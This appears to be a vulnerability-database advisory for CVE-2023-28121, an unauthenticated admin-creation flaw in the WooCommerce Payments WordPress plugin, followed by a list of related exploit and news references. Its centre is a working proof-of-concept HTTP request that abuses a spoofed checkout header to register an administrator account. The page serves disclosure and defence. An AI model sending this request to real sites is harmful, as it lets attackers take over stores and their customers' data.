Lucene search
WpvulndbWPEX-ID:0F78A245-866C-462E-BD23-43DFADB57072HistoryMar 23, 2023 - 12:00 a.m.
WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation
2023-03-2300:00:00
wpvulndb
286
woocommerce payments
unauthenticated
privilege escalation
post request
vulnerability
0.924 High
EPSS
Percentile
99.0%
The plugin has a flaw allowing unauthenticated attackers to create an admin account and take over the blog
POST /wp-json/wp/v2/users HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Wcpay-Platform-Checkout-User: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/json
{
"username": "attacker",
"email": "[email protected]",
"password": "attacker-pwd",
"roles": ["administrator"]
}Related
wpvulndb
wpvulndb
WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation
2023-03-23 00:00:00
githubexploit
githubexploit
Exploit for Improper Authentication in Automattic Woocommerce Payments
2023-03-30 23:50:39
Exploit for Improper Authentication in Automattic Woocommerce Payments
2023-07-12 02:41:26
Exploit for Improper Authentication in Automattic Woocommerce Payments
2023-07-12 06:04:56
wordfence
wordfence
Massive Targeted Exploit Campaign Against WooCommerce Payments Underway
2023-07-17 17:27:14
prion
prion
Code injection
2023-04-12 21:15:00
metasploit
metasploit
Wordpress Plugin WooCommerce Payments Unauthenticated Admin Creation
2023-07-04 17:05:07
osv
osv
CVE-2023-28121
2023-04-12 21:15:28
cvelist
cvelist
CVE-2023-28121
2023-04-12 00:00:00
nvd
nvd
CVE-2023-28121
2023-04-12 21:15:28
cve
cve
CVE-2023-28121
2023-04-12 21:15:28
openvas
openvas
nuclei
nuclei
WooCommerce Payments - Unauthorized Admin Access
2023-07-03 18:15:00
thn
thn
Zero-Day Attacks Exploited Critical Vulnerability in Citrix ADC and Gateway
2023-07-19 03:21:00
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2023-07-14 19:48:02